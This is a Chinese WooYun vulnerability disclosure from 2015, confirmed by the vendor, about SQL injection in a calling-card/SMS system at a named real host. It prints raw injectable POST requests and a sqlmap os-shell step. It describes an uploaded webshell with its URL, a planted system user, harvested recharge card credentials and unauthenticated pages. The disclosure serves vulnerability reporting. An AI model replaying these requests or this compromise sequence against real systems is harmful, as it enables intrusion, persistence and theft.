多打电话某系统SQL注入漏洞19个库DBA权限可充值(已Getshell+3389)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126340

漏洞标题：多打电话某系统SQL注入漏洞19个库DBA权限可充值(已Getshell+3389)

漏洞作者：几何黑店

提交时间：2015-07-14 09:16

修复时间：2015-08-28 09:36

公开时间：2015-08-28 09:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-14：细节已通知厂商并且等待厂商处理中
2015-07-14：厂商已经确认，细节仅向厂商公开
2015-07-24：细节向核心白帽子及相关领域专家公开
2015-08-03：细节向普通白帽子公开
2015-08-13：细节向实习白帽子公开
2015-08-28：细节向公众公开

简要描述：

多打电话某系统SQL注入漏洞19个库DBA权限可充值(已Getshell+3389)

详细说明：

POST /do/showfrees.php HTTP/1.1
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
Referer: http://log.iddsms.com:80/
Cookie: PHPSESSID=0qvtojevmi3q6u8eik14p9hk45; phpMyAdmin=bs8fod59n8t6hruc96r7hlpnaq3rk4k9; 
pma_lang=en; pma_collation_connection=utf8_general_ci; pma_mcrypt_iv=1qvTC%2Fd4Ngg%3D
Host: log.iddsms.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) 
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
sButton2=%c9%b8%d1%a1&number=1&searchAction=1

参数:number

POST /do/showhmd.php HTTP/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Referer: http://log.iddsms.com:80/
Cookie: PHPSESSID=0qvtojevmi3q6u8eik14p9hk45; phpMyAdmin=bs8fod59n8t6hruc96r7hlpnaq3rk4k9; pma_lang=en; pma_collation_connection=utf8_general_ci; pma_mcrypt_iv=1qvTC%2Fd4Ngg%3D
Host: log.iddsms.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
sButton2=%c9%b8%d1%a1&number=1&searchAction=1&username=1

参数:username

--os-shell 传个SHELL上去看看

生成了两个文件

直接上传SHELL

用户收到的通知短信还包含了默认密码

充值卡号和密码

漏洞证明：

更改了3389端口
启用NMAP,扫出1988端口

就不进去了,省的把管理员T下线了.
SHELL地址:http://log.iddsms.com/logss.php
系统用户:wooyun$
请自行删除
另外,还有几个网站文件未授权
http://log.iddsms.com/phplog/84_check_log.php
http://log.iddsms.com/phplog/africa_check_log.php?page=1
http://log.iddsms.com/do/free.php
就不一一列出了,基本上都存在未授权访问
公司网址:http://www.ashantel.com/

修复方案：

你懂的

版权声明：转载请注明来源几何黑店@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-07-14 09:35

厂商回复：

已经处理，感谢提醒！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126340

漏洞标题：多打电话某系统SQL注入漏洞19个库DBA权限可充值(已Getshell+3389)

相关厂商：iddsms.com

漏洞作者：几何黑店

提交时间：2015-07-14 09:16

修复时间：2015-08-28 09:36

公开时间：2015-08-28 09:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源几何黑店@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126340

漏洞标题：多打电话某系统SQL注入漏洞19个库DBA权限可充值(已Getshell+3389)

相关厂商：iddsms.com

漏洞作者： 几何黑店

提交时间：2015-07-14 09:16

修复时间：2015-08-28 09:36

公开时间：2015-08-28 09:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0126340"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 几何黑店@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：几何黑店

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源几何黑店@乌云